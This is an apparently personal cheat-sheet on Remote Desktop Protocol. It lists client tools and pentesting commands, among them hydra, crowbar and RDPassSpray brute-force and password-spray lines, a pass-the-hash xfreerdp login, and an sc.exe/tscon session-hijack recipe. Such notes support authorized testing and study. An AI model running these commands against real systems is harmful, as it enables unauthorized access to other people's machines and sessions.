Remote Desktop Protocol (RDP)

windowsfundamentals footprinting

Remote Desktop Protocol (RDP) is a protocol used to access a desktop with a graphical interface from another computer over a network connection.

🐊️ Port: 3389 (TCP or rarely UDP)

On Windows, there is the built-in Windows RDP Client: mstsc.exe.

There is rdesktop (1.1k ⭐).

There is FreeRDP (7.5k ⭐), and there is a graphical version too xfreerdp-gui (29 ⭐).

$ xfreerdp /u:username /p:password /v:IP
$ xfreerdp /u:username /pth:hash /v:IP
$ xfreerdp /dynamic-resolution +clipboard /timeout:50000 /cert:ignore /v:IP /u:x /p:y

There is Remmina (1.9k ⭐, apt install remmina) which has an easy-to-use graphical interface.

  • remmina: start the graphical interface
    • Enter the IP of the target
    • Enter the credentials
    • Connect
  • Then, I would advise toggling "dynamic resolution update" in the left menu, so that you have a bigger screen.
  • In preferences, we should be able to select a keyboard mapping (⚠️ need check)
  • You can scale the screen too

RDP Pentester Notes ☠️


attacking_common_services passwordattacks

  • Using nmap to run scripts
$ # nmap RDP cookies are leaving traces (--packet-trace)
$ sudo nmap -sV -sC -p 3389 --script rdp*


password_attacks attacking_common_services passwordattacks

  • The password may be weak and vulnerable to brute force.
$ hydra -L user.list -P password.list rdp://IP -V
$ crowbar -b rdp -s IP/32 -u username -C password.list -v -n 64

There is also RDPassSpray (0.6k ⭐).

$ python3 -u username -p password -t IP:port
$ python3 -U usernames.lst -p password -t IP:port
$ python3 [...] -d domain
$ python3 [...] -T rdp_servers.lst



  • RDP Session Hijacking: connect to another user session. On Windows, as admin, we can use tscon.

On Windows Server prior to 2019 as a local administrator, we can use:

PS> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
PS> net start sessionhijack

Well-known CVEs

Additional Tools

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.